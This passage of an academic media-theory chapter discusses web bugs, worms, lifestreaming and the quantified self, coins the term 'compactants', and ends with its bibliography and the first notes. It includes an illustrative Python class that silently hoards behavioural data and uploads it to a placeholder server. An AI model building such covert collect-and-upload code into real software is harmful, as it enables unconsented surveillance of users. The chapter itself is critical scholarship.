Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation are often offloaded to the ‘cloud’, that is, to server computers designed specifically for the task and accessed via networks. Indeed, many viruses seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
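&lt;br /&gt;
The dichotomous structure described here can be sketched in a few lines of code. The following is a deliberately simplified illustration, not any actual system: a compactant that passively accumulates time-stamped observations and periodically ‘calls home’ to a hypothetical server to offload aggregation. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Illustrative 'compactant' with the dichotomous structure described &lt;br /&gt;
# above: a passive mode that silently hoards time-stamped observations, &lt;br /&gt;
# and a mode that 'calls home' to offload aggregation to a server. &lt;br /&gt;
# The endpoint URL is hypothetical. &lt;br /&gt;
import json, time, urllib.request &lt;br /&gt;
 &lt;br /&gt;
class Compactant: &lt;br /&gt;
    def __init__(self, home="https://example.org/ingest"):  # hypothetical &lt;br /&gt;
        self.home = home &lt;br /&gt;
        self.hoard = []  # silently accumulated data-points &lt;br /&gt;
 &lt;br /&gt;
    def observe(self, signal, value): &lt;br /&gt;
        """Passive mode: record a behavioural signal, with no visible effect.""" &lt;br /&gt;
        self.hoard.append({"t": time.time(), "signal": signal, "value": value}) &lt;br /&gt;
 &lt;br /&gt;
    def call_home(self): &lt;br /&gt;
        """Aggressive mode: upload the hoard for server-side aggregation.""" &lt;br /&gt;
        body = json.dumps(self.hoard).encode("utf-8") &lt;br /&gt;
        req = urllib.request.Request(self.home, data=body, &lt;br /&gt;
                                     headers={"Content-Type": "application/json"}) &lt;br /&gt;
        with urllib.request.urlopen(req) as resp: &lt;br /&gt;
            self.hoard.clear()  # compact again once the data is offloaded &lt;br /&gt;
            return resp.status &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;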
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo the bad habits and behaviours of the present-self. That is, there is an explicit normative claim on behalf of a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard, a relation that has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), the present (as current data collection, or processed archival data), and the future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
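&lt;br /&gt;
As a rough illustration of this temporal structure, consider the following sketch, in which the past is a stored list of data-points, the present is the ongoing append, and the future exists as a code-object, here a trivially simple probabilistic projection (an exponentially weighted mean and variance) updated with each arriving value. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# Sketch of the temporal structure discussed above: the past as stored &lt;br /&gt;
# data, the present as ongoing appends, and the future as a code-object, &lt;br /&gt;
# here a simple probabilistic projection (exponentially weighted mean &lt;br /&gt;
# and variance) updated in real time. Illustrative only. &lt;br /&gt;
class Stream: &lt;br /&gt;
    def __init__(self, alpha=0.2): &lt;br /&gt;
        self.past = []    # the archive: stored, time-stamped data &lt;br /&gt;
        self.mean = 0.0   # the future as model: expected next value &lt;br /&gt;
        self.var = 0.0 &lt;br /&gt;
        self.alpha = alpha &lt;br /&gt;
 &lt;br /&gt;
    def append(self, t, value): &lt;br /&gt;
        """The present: ingest one data-point and update the projection.""" &lt;br /&gt;
        self.past.append((t, value)) &lt;br /&gt;
        delta = value - self.mean &lt;br /&gt;
        self.mean += self.alpha * delta &lt;br /&gt;
        self.var = (1 - self.alpha) * (self.var + self.alpha * delta * delta) &lt;br /&gt;
 &lt;br /&gt;
    def forecast(self): &lt;br /&gt;
        """The future as an object: a distribution over the next value.""" &lt;br /&gt;
        return {"expected": self.mean, "variance": self.var} &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;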
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways it undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship (ref: 211106), which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at Unlike Us in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of this chapter to: the PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; the ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; the Digital Humanities Workshop, organised by Caroline Bassett, University of Sussex; the Media Innovations Colloquium, organised by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'', organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
